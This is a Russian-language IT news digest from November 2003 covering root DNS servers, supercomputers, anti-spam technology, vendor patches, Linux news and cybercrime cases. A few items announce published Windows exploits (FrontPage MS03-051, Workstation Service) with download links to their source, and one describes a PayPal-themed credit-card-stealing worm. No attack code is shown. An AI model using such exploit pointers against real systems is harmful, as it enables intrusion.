http://www.pcworld.com/news/article/0,aid,113515,00.asp
19/11/2003 20:46 В Москве создан первый корневой сервер имен
Американская организация по разработке и распространению ключевых интернет-протоколов Internet Software Consortium (ISC) в сотрудничестве с Московским центром обмена трафиком (Internet Exchange - MSK-IX) установили и будут эксплуатировать в Москве новый корневой DNS-сервер. Данный сервер является зеркалом корневого сервера имен F, управление которым осуществляется компанией ISC. С учетом того, что других корневых серверов имен в данном регионе нет, новый сервер должен значительно повысить скорость доступа к интернет-ресурсам для пользователей в России. "Мы полностью удовлетворены результатами сотрудничества с ISC по инсталляции локального узла корневого сервера F доменной системы имен (DNS)", – заявила директор АНО "ЦВКС МСК-IX" Елена Воронина. – "Наличие такого сервера в Москве приведет к повышению безопасности и стабильности сетей, позволит сократить время отклика DNS-серверов и объем международного трафика, а следовательно, повысит эффективность и надежность работы поставщиков услуг интернета (ISP)". Джоао Дамас (Joao Damas), старший менеджер программ ISC, прокомментировал это следующим образом: "Россия – это одна из крупнейших стран мира, и для нас большая честь способствовать развитию в России интернета за счет создания этого сервера имен. Если считать эту инсталляцию, то ISC уже создал в 2003 г. 13 новых локальных узлов. Мы гордимся теми успехами, которых мы достигли в плане внедрения корневых серверов F во всем мире, и нашим сотрудничеством с Московским Internet Exchange, в частности". Источник - http://www.cnews.ru
19/11/2003 20:21 Sun Microsystems Inc. займется производством антивирусных программ.
Производитель программного обеспечения Sun Microsystems Inc. объявил во вторник о намерении приобрести компанию Waveset Technologies Inc., занимающуюся разработкой и производством программ и устройств для защиты от вирусов и хакеров, сообщает American City Business Journals. Сделка, в результате которой Waveset Technologies Inc. станет подразделением Sun Microsystems Inc. должна быть оформлена до конца этого года. Сумма соглашения остается в тайне. Неясным также пока остается, какая роль будет отведена в рамках нового предприятия действующему руководству Waveset Technologies Inc. Штат главного офиса Waveset Technologies Inc. в Остине составляет 100 человек. Всем им уже предложены рабочие места в структуре Sun, число работников которой по всему миру насчитывает около 36 тысяч человек. Источник - http://www.viruslist.com
19/11/2003 20:09 США строят суперкомпьютер в 300 раз мощнее японского конкурента.
Американский исследовательский институт Battelle Memorial Institute заявил о начале разработки самого мощного в мире суперкомпьютера. Суперкомпьютер планируется построить к 2008 году и он будет способен выполнять до 1000 триллионов операций в секунду, сообщает Asscosiated Press. Машина строится на базе национальной лаборатории правительства США Oak Ridge в штате Теннеси. Ее предполагается использовать совместно с другими правительственными научно-исследовательскими структурами и Государственным университетом штата Огайо для решения различных задач, в частности, в области биологических исследований. В настоящее время самым мощным суперкомпьютером считается японская машина Earth Simulator, способная выполнять 35,8 триллиона операций в секунду. Новый американский суперкомпьютер будет мощнее ее примерно в 300 раз. На его строительство создатели предполагают затратить 500 миллионов долларов. Подробности - http://www.smh.com.au/text/articles/2003/11/17/1069027044760.html
18/11/2003 15:46 Как остановить спам при помощи honeypot.
В статье Steven J. Vaughan-Nichols "Stopping Spam before the Gateway: Honeypots" описан метод, при помощи которого системные администраторы, обслуживающие почтовые сервера могут более успешно бороться со спамом. Для этой цели организуется специальный сервер (физический или виртуальный), который снаружи виден в качестве открытого ретранслятора (ope nrelay), что по своей сути представляет собой технологию honeypot. В отличие от настоящего открытого ретранслятора почта с такого сервера не отправляется дальше, а сохраняется на самом сервере (либо уаляется). Применение подобной технологии позволяет изучить технику, которой пользуются спаммеры. Изучение её позволяет в дальнейшем настроить соответствующим образом противспамовый фильтр реального почтового сервера. Необходимо отметить, что нечто подобное сейчас используют многие свободные почтовые системы (mail.ru, hotmail etc.), где в качестве подобного хонейпота выступают пользователи почтовой системы, отправляющие письма администраторам почтового сервера с пометкой "Пометить, как спам". ;) Cтатья - http://www.enterpriseitplanet.com/security/features/article.php/3108311
18/11/2003 14:14 Microsoft решилась открыть форматы Office 2003.
В понедельник Microsoft объявила: она будет лицензировать на условиях royalty-free форматы файлов на базе XML, используемые в последней версии своего комплекса приложений Office. Этот шаг нацелен на то, чтобы облегчить компаниям доступ к документам, созданным в приложениях Office 2003. Microsoft называет его ответом на просьбы партнеров по программному обеспечению и корпоративных и государственных заказчиков, которым необходима большая свобода в работе с самыми популярными настольными приложениями. С 5 декабря компания сделает доступными эталонные схемы Extensible Markup Language (XML) для Excel и редактора форм InfoPath. XML-схема для Word, WordprocessingML доступна в онлайне с понедельника. Для публикации информации Microsoft, по ее словам, пользуется стандартом XML Schema Definitions (XSDs) организации World Wide Web Consortium (W3C). Но в отличие от промышленных стандартов, контролируемых отраслевыми союзами, Microsoft сама будет диктовать условия разработки схемы для Office, отмечает аналитик ZapThink Рон Шмельцер. «Проблема в том, что формат контролирует Microsoft, которая может вносить в него изменения в любое время, — говорит он. — Так что любому разработчику, желающему обеспечить совместимость с Office 2003, придется следовать в фарватере Microsoft». Подробности - http://www.zdnet.ru/?ID=309451
18/11/2003 13:05 Патч для Mozilla.
Выпущен патч для популярного браузера Mozilla, онвное назначение которого - включение кросс-платформенной поддержки NTLM - аутентификации для протоколов HTTP, IMAP, SMTP, POP3. Включение этой поддержки позволит браузеру полноценно взаимодействовать с серверами под управлением ОС Windows. Автор патча - Darin Fisher. Предполагается, что поддержка (не в виде патча) будет включена в бета-верссию 1.6. Описание патча - http://bugzilla.mozilla.org/show_bug.cgi?id=224653
18/11/2003 12:27 Коррекция ошибок "по воздуху".
Японский оператор сотовой связи NTT DoCoMo и корейский SK Telecom начали предоставлять абонентам возможность удаленного обновления фирменного программного обеспечения их телефонов. Аналогов в мире новые службы пока не имеют. Ранее для установки обновлений абоненты DoCoMo должны были посещать сервисный центр компании. За последние два года оператору приходилось не раз обновлять ПО или даже заменять телефоны абонентам. Так, в октябре прошлого года ошибка в телефоне производства Toshiba приводила к потере возможности получать электронную почту при включенном режиме экономии электроэнергии. Основой южнокорейской системы обновления "по воздуху" является платформа MProve, разработанная начинающей фирмой Bitfone. В числе ее инвесторов - венчурные предприятия компаний Nokia, Motorola и Orange. По выходе очередного обновления абонент получает уведомление с возможностью принять или отклонить инсталляцию. Для экономии пользователь получает не всю "прошивку" целиком, а лишь небольшой файл, содержащий только изменения по сравнению с предыдущей версией. Источник - http://www.osp.ru
18/11/2003 12:05 Microsoft предлагает свой способ борьбы со спамом.
Выступая с речью на выставке Comdex Fall 2003, проходящей в эти дни в Лас-Вегасе (штат Невада), основатель корпорации Microsoft Билл Гейтс рассказал о многих новых технологиях, над созданием и внедрением которых работает софтверный гигант. Одной из главных проблем сегодняшнего дня является проблема непрошеной электронной корреспонденции или спама. Эта проблема волнует и Microsoft. Поэтому в исследовательском подразделении Microsoft вплотную занялись разработкой средств для борьбы с мусорной корреспонденцией. Результатом такой работы стала технология SmartScreen. Данная технология основана на статистических алгоритмах. Известно, что абсолютное большинство спамерских посланий имеют специфические характеристики и фрагменты, нетипичные для нормальных писем. Если иметь в распоряжении достаточно большую статистику по спаму и обычной электронной корреспонденции, то можно с большой долей вероятности выявить, является ли каждое конкретное письмо спамом. В Microsoft уже реализовали поддержку SmartScreen в пакете Outlook 2003, клиентской программе MSN 8 и бесплатной почтовой службе Hotmail. Именно Hotmail стала, в свое время, полигоном для сбора статистики о спаме. Подробности - http://www.microsoft.com/presspass/press/2003/nov03/11-17ComdexAntiSpamPR.asp
18/11/2003 11:47 ФСБ лицензировала деятельность БП.
Компания «Банковский производственный центр», российский интегратор и поставщик решений в области электронных платежей, электронного бизнеса и банковских систем самообслуживания, получила лицензии ФСБ на техническое обслуживание и распространение шифровальных средств, а также на разработку и производство шифровальных средств, информационных и телекоммуникационных систем, защищенных с использованием криптографических средств. Источник - http://www.cnews.ru
18/11/2003 11:35 Microsoft Exchange уязвим для спамеров.
Как сообщает compulenta.ru, почтовые серверы Microsoft Exchange могут использоваться для рассылки спама без ведома их администраторов. К такому выводу пришли в компании Think Computer (и опубликовали соответствующий отчёт в формате PDF) после анализа жалобы одного из клиентов. При этом, по стандартам Microsoft, такие серверы являются безопасными. Не проходят они и тесты для открытых почтовых шлюзов. Это, однако, не меняет ситуации - во многих случаях спам распространяется через серверы на базе Exchange. По мнению Think Computer, в почтовых серверах Exchange версий 5.5 и 2000 имеется серьезная уязвимость. Она связана с тем, что сервер позволяет использовать гостевую учетную запись для пересылки почты и, более того, автоматически задействует ее, если аутентификация пользователя по каким-то причинам не прошла. При этом становится возможной пересылка почты в обход установленных администратором ограничений. В Think Computer отмечают, что в Microsoft знают о проблеме. Ее краткое описание имеется в базе данных Microsoft. Для ликвидации уязвимости достаточно отключить гостевую учетную запись. Однако по мнению Think Computer, число серверов Exchange, использующихся спамерами, очень велико, и Microsoft не мешает более серьезно отнестись к проблеме. Впрочем, в Exchange Server 2003 дыра была устранена. Описание (Microsoft) - http://support.microsoft.com/default.aspx?scid=kb;en-us;251149 Отчёт Think Computer - http://www.thinkcomputer.com/corporate/news/spamserver.pdf
18/11/2003 10:12 Россия хочет передать контроль над Интернетом в руки ООН.
По сообщениям lenta.ru, делегации ряда стран при ООН намереваются поставить вопрос об учреждении под эгидой ООН специального контролирующего органа, который бы занимался администрированием Интернета. Этот вопрос предполагается поднять на проводимом ООН Всемирном саммите информационного общества (WSIS), который пройдет в Женеве в начале декабря. Как сообщает газета Washington Times, в ходе предварительных консультаций в пользу идеи контроля за Интернетом на уровне ООН высказались, в частности, Россия, Китай, Бразилия, Индия и Саудовская Аравия. Как известно, в настоящее время административные функции в Интернете выполняет общественная организация ICANN (Корпорация по распределению номеров и имен в Интернете), которая базируется в американском штате Калифорния. Ее деятельность сводится к распределению блоков IP-адресов и регулированию прав на доменные имена верхнего уровня. Страны-инициаторы проекта (отмечается, что главным образом это страны с развивающейся экономикой) хотели бы передать административные функции структуре, подконтрольной ООН - например, уже существующему Международному телекоммуникационному союзу (ITU). Однако против этой инициативы уже высказались США, страны Евросоюза, Япония и другие индустриально развитые государства, представители которых заявляют, что вмешательство государственных структур в регулирование Интернета может ущемить свободу слова и самовыражения граждан и препятствовать динамичному развитию информационного общества. Подробности - http://www.washtimes.com/world/20031117-113002-7678r.htm
17/11/2003 19:46 Kismet - сниффер беспроводных сетей.
На странице, ссылка на которую приведена ниже, автор (Mike Kershaw) рассказывает о созданном им сниффере беспроводных (они же Wi-Fi, они же 802.11) сетей под названием Kismet. При помощи этого программного продукта можно обнаруживать и прослушивать в определённом районе существующие беспроводные сети. Список поддерживаемых ОС: Linux, Linux-ARM, BSD, Win32 (Cygwin), MacOS X. Список поддерживаемых карт ещё более впечатляющ (10 карт), также включает поддержку GPS. Страница проекта - http://www.kismetwireless.net/documentation.shtml
17/11/2003 19:03 Ноябрьский номер Crypto-Gram.
Bruce Schneier cообщает о выпуске своего еженедельного электронного журнала Crypto-Gram, посвящённого компьютерной (и иной) безопасности. В этом выпуске: Airplane Hackers; The 9/11 Terrorists' Real Weapon; Crypto-Gram Reprints; News; Counterpane News; More Beyond Fear Reviews; The Doghouse: SunnComm Technologies; The Trojan Defense; Comments from Readers. Журнал - http://www.schneier.com/crypto-gram-0311.html
17/11/2003 18:32 Red Hat выпустила ряд патчей.
Компания Red Hat рекомендует своим пользователям обновить ПО, установив пакеты, корректирующие уязвимости в защите PostgreSQL, stunnel, XFree64 и Zebra. Среди последствий использования этих дыр – возникновение ситуации Denial of Service, выполнение несанкционированного кода и изменение уровня привилегий. В PostgreSQL, которая, как известно, является СУБД с открытым кодом, проблема возникает в функции pg_to_ascii() при переполнении буфера, что позволяет вызывать отказ в обслуживании или выполнять произвольный код. Stunnel представляет собой упаковщик "безопасного туннелирования" для сетевых соединений, используемых при переходе от незакодированного соединения к закодированному соединению, или при подключении через кодируемое соединение к сервисам, которые не поддерживают такую возможность. Проблемы в функциях обработки неерентерабельных сигналов могли позволить атакующему захватывать сервис. XFree86, являющееся реализацией X Window System, включает графический пользовательский интерфейс и видеодрайвера, а возникающая в ней ошибка целочисленного переполнения в библиотеках фонтов может позволить захват рутовых привилегий внутреннему или удаленному злоумышленнику. Zebra представляет собой реализацию маршрутизационного ПО для протокола TCP/IP, для одного из сервисов которого можно удаленно спровоцировать отказ от обслуживания, если известен пароль. Уязвимости подвержены следующие продукты Red Hat: AS 2.1/ES 2.1/WS 2.1, Linux 7.2-9, а также Linux Advanced Server 2.1 и Workstation 2.1 для Itanium. Источник - http://www.cnews.ru
17/11/2003 18:07 Adobe выпустила серверную версию Acrobat.
В понедельник Adobe Systems анонсирует серверную версию Acrobat, своего набора приложений для создания файлов в распространенном формате Portable Document Format. Acrobat Elements Server нацелен на ту же аудиторию рядовых конторских служащих, что и Acrobat Elements, более простая версия ПО, которую Adobe выпустила в начале этого года в рамках обновления семейства Acrobat. Сейчас Adobe проводит широкую кампанию по превращению PDF — и без того популярного стандарта распространения документов по интернету — в многоцелевой инструмент обмена бизнес-данными. Acrobat Elements, распространяемый за 29 долл. только в рамках оптовых планов лицензирования среди крупных заказчиков, служил средством популяризации PDF в конторской среде, предлагая несколько простых инструментов для преобразования файлов в формат, удобный для рассылки по e-mail и других целей. Acrobat Elements Server устанавливается на центральном сервере компании, так что сотрудники могут обращаться к его функциям через веб-сервер и другие средства. Простейший способ преобразовать файл — отбуксировать его в папку на рабочем стол. Подробности - http://news.com.com/2100-1012_3-5107749.html?tag=nefd_top
17/11/2003 17:52 Магистратский суд провел первое слушание по делу 17-летнего австралийского хакера.
В понедельник в магистратском суде австралийского города Брисбейн состоялось первое слушание по делу 17-летнего Эдэма Захари Гилмора (Adam Zachary Gilmore), подозреваемого в незаконном проникновении в сети Кембриджского университета и мельбурнского интернет-провайдера Pacific Internet, сообщает сайт газеты The Australian. По словам директора-распорядителя компании Pacific Internet Дэнниса Мускэта (Dennis Muscat), во время незаконного проникновения в сеть Гилмору не удалось получить доступ к сведениям о клиентах. Взлом системы провайдера оказался возможен после того, как с помощью специальной программы для сбора паролей через интернет обвиняемый сумел получить администраторский доступ. "Хакер был на пороге, но не смог войти в дверь", - прокомментировал действия Гилмора Мускэт и добавил, что успешному проведению атаки помешали антихакерские экраны. Сотрудники австралийского Центра по борьбе с преступлениями в сфере высоких технологий сумели арестовать 17-летнего хакера в течение суток с момента получения заявления о попытке взлома от Pacific Internet. До следующего судебного заседания, которое состоится в феврале следующего года, Гилмор отпущен под залог. Источник - http://www.viruslist.com
17/11/2003 17:39 Новая версия рейтинга 500 мощнейших суперкомпьютеров.
Как сообщает compulenta.ru,16 октября на суперкомпьютерной конференции в Финиксе, штат Аризона, был представлен новый вариант списка 500 мощнейших суперкомпьютеров мира. Рейтинг составляется на основе результатов, демонстрируемых компьютерами в тесте Linpack. Лидер рейтинга остался неизменным: компьютер Earth Simulator, построенный японской компанией NEC, продолжает демонстрировать рекордную производительность в 35,86 терафлопс (его пиковая производительность составляет 40,96 терафлопс). На втором месте идет компьютер ASCI Q, построенный компанией HP для Лос-Аламосской национальной лаборатории. Это кластер из компьютеров Alpha Server (8192 процессора Alpha с частотой 1,25 ГГц) демонстрирует производительность в 13,88 терафлопс. На третьем месте идет новый участник рейтинга - кластер из 1100 двухпроцессорных компьютеров PowerMac G5, построенный в Вирджинском политехническом институте. Его производительность составляет 10,28 терафлопс. На четвертом месте (9,82 терафлопс) идет еще один кластер из серверов Dell PowerEdge 1750 с 2500 процессорами Intel Xeon. По количеству компьютеров в рейтинге продолжает лидировать Hewlett-Packard со 165 машинами. Второе место занимает IBM, у которой в рейтинге 159 суперкомпьютеров. Третье место занимает SGI с 41 системой. По суммарной производительности всех суперкомпьютеров лидирует IBM (35,7% мощности), затем идет HP (22,7%) и NEC (8,7%). Барьер в 1 терафлопс преодолел уже 131 суперкомпьютер. При этом число участвующих в рейтинге компьютеров на процессорах Intel выросло со 119 до 189. Подробности - http://www.top500.org/list/2003/11/
16/11/2003 20:24 Internetworking Technology Overview.
Владимир Плешаков опубликовал перевод очень интересной и, несомненно, очень полезной книги (мануала) под названием "Internetworking Technology Overview", издаваемой Cisco Inc. Довольно подробно описаны различные сетевые протоколы и схемы их взаимодействия. Подробно описываются все современные протоколы маршрутизации. Ссылка - http://www.mark-itt.ru/CISCO/ITO/
16/11/2003 20:07 Эксплоит уязвимости Microsoft FrontPage.
Опубликован эксплоит уязвимости, обнаруженной в FrontPage-компоненте операционных систем WinXP, 2K. Ранее о ней сообщал Бретт Мур (уязвимость обнаружена в библиотеке fp30reg.dll и позволяет, в результате выполнения кода в системе получить удалённый шелл), заплатка была анонсирована в бюллетене от M$ - MS03-051. Автор эксплоита Adik (он же NETNINJA) из Бишкека, Киргизия. На приведённой ниже странице можно скачать как исходник, так и откомпилированный бинарник. Страница - http://netninja.to.kg/
16/11/2003 19:56 Об основных изменениях в WinXP SP2.
Майкл Ховард, специалист по безопасности корпорации Microsoft, представил широкой секьюрити-общественности обзор основных изменений в безопасности различных компонентов Windows XP, которые планируется внести в грядущий второй сервис-пак. Изменений довольно много - начиная от изменения механизма защиты памяти и заканчивая работой различных сетевых служб и компонентов (в том числе печально известных RPC и DCOM). Как следует из названия, это черновой вариант, который предполагает обсуждения и исправления. Статья - http://msdn.microsoft.com/library/en-us/dnwxp/html/securityinxpsp2.asp
16/11/2003 19:37 Переход от RedHat на Fedora Core.
Как пишет McMCC (linux.org.ru) им была написана статья "Переход от RedHat на Fedora Core", опубликованная на сайте mcmcc.bat.ru. Данная статья посвящена недавно вышедшему дистрибутиву Fedora Core. В статье рассматриваются некоторые рекомендации и исправления части найденых проблем, думается, что эта статья будет многим интересна, так как она затрагивает некоторую часть основных моментов. Fedora Core (далее FC) стала заменой свободно распространяемых дистрибутивов от RedHat, сам же RedHat полностью свернул это направление и будет уделять внимание только своим коммерческим продуктам, однако проект FC спонсируется RedHat и полностью находится под их контролем, к тому же вcе протестированые приложения из FC будут прямиком попадать в дальнейшие версии их коммерческих продуктов, поэтому "полностью свернул" можно считать чистой формальностью. Статья - http://mcmcc.bat.ru/fedora/
16/11/2003 19:03 Новая версия графического формата PNG.
Консорциум World Wide Web (W3C) представил вторую редакцию спецификации графического формата PNG (читается ping). Подготовке новой спецификации предшествовали семь лет исправления ошибок и доводки формата. Важно отметить, что новая версия спецификации PNG утверждена не только W3C, но и международной организацией по стандартизации (ISO) и Международной электротехнической комиссией (IEC). Соответствующий документ получил индекс ISO/IEC 15948:2003. В свое время, формат PNG был разработан, как альтернатива популярному формату GIF. В последнем использовалось сжатие по алгоритму LZW, патентом на который обладала компания Unisys. В определенный момент эта компания решила заявить о своих правах и начала требовать отчислений за использование GIF. В нынешнем году американский патент на LZW истек, и GIF стал свободным форматом. Интересно, что патентные проблемы так и не привели к отказу от использования GIF. По всей видимости, Unisys удалось договориться с крупными игроками на графическом рынке, а с мелкими компаниями и частными лицами хозяева патента на LZW предпочли не связываться. Спецификация - http://www.w3.org/TR/2003/REC-PNG-20031110/
16/11/2003 18:38 Hewlett-Packard разработала электронную память из пластика.
Специалисты исследовательской лаборатории компании Hewlett-Packard совместно с учеными из Принстонского университета разработали прототип модуля электронной памяти, принципиально отличающийся от традиционных носителей. Его основа - пластиковая пленка и кремниевый диод на подложке из металлической фольги, сообщается в пресс-релизе на сайте Hewlett-Packard. По словам разработчиков, гибридный модуль памяти на основе пластика будет значительно дешевле в производстве в сравнении с устройствами хранения информации, основанными на использовании кремниевых микросхем, оптических и магнитных носителей. Главной сферой применения своей разработки специалисты Hewlett-Packard считают цифровые фотоаппараты, плееры и другие портативные электронные устройства, в которых сегодня используются карты флэш-памяти, передает агентство Associated Press. Более подробно - http://www.lenta.ru/internet/2003/11/14/memory/
15/11/2003 21:15 Злостных пиратов будут сажать на пять лет.
Проблема контрафакта влечет за собой огромные финансовые потери – и для обладателей интеллектуальной собственности, и для государственного бюджета России. Поэтому необходим более жесткий подход к решению данной проблемы. Такое мнение высказал президент торгово-промышленной палаты РФ Евгений Примаков, выступая на международной конференции "Контрафактная продукция - проблемы и пути их решения". Участники конференции отмечают, что ситуация, сложившаяся в связи с массовым распространением контрафактной и фальсифицированной продукции, заслуживает самого серьезного внимания со стороны государственной власти. «Европейский Союз рассматривает возможность уголовного преследования изготовителей контрафактных товаров, включая высокие штрафы и тюремное заключение», - отметил Евгений Примаков. Глава ТПП считает, что имеет смысл последовать их примеру. В настоящее время страна готовится вступить в ВТО, в рамках которой действует соглашение о сотрудничестве стран, участвующих в борьбе с контрафактом. Нерешенность проблемы защиты интеллектуальной собственности ведет к замедлению интеграции России в мировую экономику. Заместитель генерального прокурора РФ Владимир Колесников предлагает уже при первичном совершении преступления наказывать всю цепочку правонарушителей (изготовителей, экспедиторов, реализаторов контрафактной продукции) лишением свободы сроком на один год. А при повторном совершении преступления срок лишения свободы должен увеличиться до пяти лет. «При этом в законе необходимо предусмотреть и конфискацию имущества, – говорит г-н Колесников. - Если мы осуществим это - поверьте мне, завтра же в стране кардинально изменится ситуация с контрафактом». Кроме того, должна быть усилена ответственность и за незаконное использование товарных знаков Источник - http://www.cnews.ru
15/11/2003 20:36 Генпрокуратура раскодировала сервер ЮКОСа.
Следователям Генпрокуратуры удалось раскодировать данные компьютерного сервера, изъятого в ходе одного из обысков в октябре в подмосковном поселке Жуковка, сообщает «Эхо Москвы». Об этом сегодня сообщила официальный представитель Генпрокуратуры РФ Наталия Вишнякова. По ее словам, Генпрокуратуре удалось получить доступ к закодированным данным сервера. При этом число данных и документов превышает 70 тысяч. Напомним, что в начале октября Генрокуратура провела обыски бизнес-центра в подмосковной Жуковке. Там следователи обнаружили и изъяли сервер обанкротившегося банка МЕНАТЕП и финансовые документы, относящиеся к деятельности структур, подконтрольных нефтяной компании ЮКОС, а также компьютерную информацию и финансовую документацию о движении средств за рубежом, как самой компании, так и частных лиц. При этом число данных и документов превышает 70 тысяч. Источник - http://top.rbc.ru/
15/11/2003 20:13 Еще один дистрибутив Linux.
По информации с linux.org.ru, активистом движения Opensource Брюсом Перенсом была предложена новая версия дистрибутива Linux под названием userLinux, которая призвана бесплатно заменить то, что RedHat собирается продавать за деньги (Enterprise version) под волчьими условиями лицензии. За спиной у Перенса стоят неназванные им спонсоры, которые расчитывают создать бесплатный дистрибутив с неограниченным количеством рабочих мест, и сертифицированный у крупных производителей компьютеров. Подробности - http://www.wired.com/news/...
15/11/2003 20:01 Антивирус Касперского® 5.0 для Lotus Notes/Domino.
"Лаборатория Касперского", сообщает о коммерческом релизе новой версии Антивируса Касперского® 5.0 для Lotus Notes/Domino, входящего в состав пакетов Антивирус Касперского Business Optimal и Kaspersky Corporate Suite. Продукт включает в себя ряд существенных изменений, повышающих эффективность и эргономичность эксплуатации. Антивирус Касперского для Lotus Notes/Domino предназначен для обеспечения централизованной защиты от вредоносных программ для почтовых шлюзов корпоративного уровня. Продукт устанавливается на сервере, работающем под управлением операционной системы Linux или Windows NT, и проверяет проходящий почтовый трафик (включая вложенные файлы) на присутствие вирусов. В случае обнаружения вирусной атаки Антивирус Касперского предлагает возможность лечения или изолирования электронных писем. Антивирус Касперского 5.0 для Lotus Notes/Domino создан на основе нового антивирусного ядра, которое отличается повышенной устойчивостью, надежностью сканирования и производительностью. Продукт содержит полностью переработанный интерфейс, который стал гораздо удобнее для пользователя. Он отличается большей эргономичностью и логичностью расположения индикаторов управления. Интерфейс построен в соответствии со стандартами веб-дизайна и позволяет производить удаленный контроль и мониторинг состояния антивирусной защиты посредством интернет-доступа. Источник - http://www.kaspersky.ru
15/11/2003 19:23 Интернет - шпионаж: что может быть проще?!
В последнее время высокотехнологический шпионаж становится одной из наиболее коварных целей использования Всемирной паутины. Программное обеспечение, которое защищает пользователей от вирусов, не в состоянии обнаружить незаконных разведчиков. Сотрудники веб-сайтов NBC11 и MSNBC.Com совместно изучили проблему. «Когда вы смотрите на монитор собственного ПК, кто-то, возможно, смотрит на вас», - рассказывает Скотт Будмэн из NBC11. В наше время чрезвычайно легко получить программу, которая позволяет следить за пользователями Сети. «Она предоставляет своему анонимному обладателю всю информацию о вас: посещаемые веб-ресурсы, электронные письма, пароли», - добавляет Боб Салливан из MSNBC.Com. Сегодня то, что мы называем шпионским софтом, может появиться в виде невинного электронного сообщения или даже поздравительной открытки. На подобных штучках специализируется калифорнийская компания E-mail P.I.. Неосведомленный серфер не подозревает, что стал мишенью пристального наблюдения. Даже самые лучшие программы по компьютерной безопасности не могут зафиксировать вторжение – ведь «шпионы» не просят вас открыть приложение к письму или ответить на какие-либо вопросы, они просто автоматически инсталлируют себя в систему. Более подробно - http://www.runet.ru/news/4153.html
15/11/2003 19:00 IBM демонстрирует стать Blue Gene.
В пятницу IBM сообщит первые данные о фактической производительности своего суперкомпьютера Blue Gene/L — размером с посудомоечную машину, он способен выполнять 1,4 трлн вычислений в секунду. Этого быстродействия достаточно, чтобы поставить машину на 73 место в мировом рейтинге 500 суперкомпьютеров, который будет опубликован в воскресенье. К 2005 году IBM усовершенствует 1024 процессора своей системы и свяжет ее со 127 другими идентичными системами, претендуя на первое место в рейтинге. Blue Gene/L — в некотором смысле экзотическая машина, ставшая результатом первого этапа реализации проекта IBM по решению трудной вычислительной задачи из области генетики: прогнозированию, исходя из законов физики, свойств сложных структур, образуемых белками. Сегодня спецпроцессоры Blue Gene/L работают с частотой 700 МГц, но в будущем году они станут на 40% быстрее, говорит директор отделения IBM Deep Computing и руководитель проекта Билл Пуллейблэнк. IBM надеется, что в полной конфигурации, состоящей из 64 стоек и примерно 131 072 процессоров, машина достигнет быстродействия в 360 трлн операций в секунду (360 гигафлопс). Подробности - http://news.com.com/2100-7337_3-5107422.html?tag=nefd_top
15/11/2003 18:57 VeriSign начала поддерживать кириллические доменные имена.
Американская компания VeriSign, регистрирующая адреса сайтов в доменных зонах .com и .net, объявила о начале обслуживания доменных имен, содержащих кириллические символы. Теперь, набрав например, адрес www.россия.net, пользователь попадает на страничку, предлагающую загрузить специальную бесплатную программу i-Nav, установив которую, дальше он сможет осущеcтвлять нормальную навигацию. Русский язык стал четвертым, на который распространилась система "Многоязычных доменных имен" (Internationalized Domain Names) - после китайского, корейского и японского, пишет "Ведомости" со ссылкой на вице-президента VeriSign по международным связям Барта Маккея. Он предполагает также, что к 2008 году более 40 процентов всех доменных имен будут содержать отличные от латиницы символы. Маккей считает, что Россия может занять пятое место в списке регистраторов подобных доменных имен - после Китая, Кореи, Японии и Тайваня. На сайте VeriSign.com заявление Маккея недоступно, но зато объясняется, что отныне доменные имена могут регистрироваться в 33 таблицах символов Unicode, "покрывающих" 350 языков. Истгочник - http://www.lenta.ru
14/11/2003 13:28 Статья "Атака на DNS-протокол".
На сайте www.net-security.org опубликована статья "Attacking the DNS Protocol" Sainstitute.org. В анонсе статьи, написано, что, собственно говоря, ничего особо нового в ней нет, но она представляет собой попытку свести воедино все известные методы атак на службу DNS, которая, безусловно является краеугольным камнем всего Internet. Формат - PDF. Cтатья - http://www.net-security.org/dl/articles/Attacking_the_DNS_Protocol.pdf
14/11/2003 13:03 Эксплоит уязвимости в службе WKS.
Опубликован эксплоит уязвимости, которая была обнаружена в WKS (Workstaion Service) ОС Windows XP/2K. Как пишет сам автор (snooq), эксплоит тестировался для удалённого взлома Win2K. Исходник предназначен для ОС Win32. Эксплоит - http://packetstorm.linuxsecurity.com/0311-exploits/o_wks.c
14/11/2003 12:13 Внимание! Зафиксировано активное распространение червя I-Worm.Mimail.i.
"Лаборатория Касперского" предупреждает о распространении новой версии интернет-червя I-Worm.Mimail, с присвоенным идентификатором "i". Червь распространяется через Интернет в виде файла "paypal.asp.scr", прикрепленного к зараженным письмам. I-Worm.Mimail.i является приложением Windows (PE EXE-файл). Он имеет размер около 12К, упакован UPX (размер распакованного файла - около 30К). Адрес отправителя зараженного письма фальсифицирован - donotreply@paypal.com. Заголовок сообщает пользователю об окончании действия аккаунта в платежной системе PayPal (YOUR PAYPAL.COM ACCOUNT EXPIRES).Червь получает управление только если пользователь самостоятельно откроет вложенный файл. Имя вложения: paypal.asp.scr. При запуске червь выводит на экран диалоговое окно, в котором просит указать данные кредитной карточки PayPal. Введенные данные сохраняются в файле "ppinfo.sys", который затем отсылается злоумышленнику. Источник - http://www.kaspersky.ru
14/11/2003 12:07 Обзор клиентов ICQ для ОС Linux.
В последнее время довольно большое количество народа переходит на ОС Linux. Многих в ней привлекает открытость исходного кода, многих - просто желание познакомиться с новой операционной системой. Переход на незнакомую поначалу операционную систему, как правило, сопровождается мучительным процессом поиска программ, которые могли бы в какой-то степени на первых порах заменить "родные" и до боли знакомые интернет-пейджеры, почтовики, текстовые редакторы, игрушки и просто безделушки, без которых, порой, не представляешь жизнь своего "железного" друга... Статья под названием "LICQ, SIM, GAIM и другие: "атака клонов", автором которой значится Vova, опубликованная на сайте fcenter.ru, как раз и посвящена обзору основных ICQ-клиентов ОС Linux. Cтатья - http://www.fcenter.ru/articles.shtml?utilities/7898
14/11/2003 11:31 Челябинец надул иностранцев на 9 тысяч долларов.
Как сообщает www.internet.ru (недавно наконец-то открывшийся), житель уральского города в течение нескольких лет путем обмана обирал доверчивых пользователей Интернета из семи различных стран. Правоохранительные органы изобличили мошенника. В ходе расследования выяснилось, что промысел в Сети челябинец осуществлял не один год. Используя свой компьютер, он выманил у семи иностранных граждан денежные суммы в размере 9 тысяч долларов США. Как сообщает Урал-пресс-информ, пострадавшие оказались гражданами Канады, Италии, Германии, Бельгии, Голландии, Австралии и Новой Зеландии. В ходе следствия у обвиняемого изъяты четыре компьютера, иностранная валюта, большое количество ювелирных и парфюмерных изделий, коллекционных монет различных стран и другие ценности, - сообщает пресс-служба заместителя Генпрокурора РФ в Уральском федеральном округе. Наложен арест на денежные средства обвиняемого, находящиеся в одном из банков Швейцарии. Обвинительное заключение по делу челябинского "умельца" (фамилия которого не разглашается) утверждено заместителем Генерального прокурора РФ Юрием Золотовым и передано в суд. Источник - http://uralpress.ru/
14/11/2003 11:03 Discreet выпустил новую версию 3ds max.
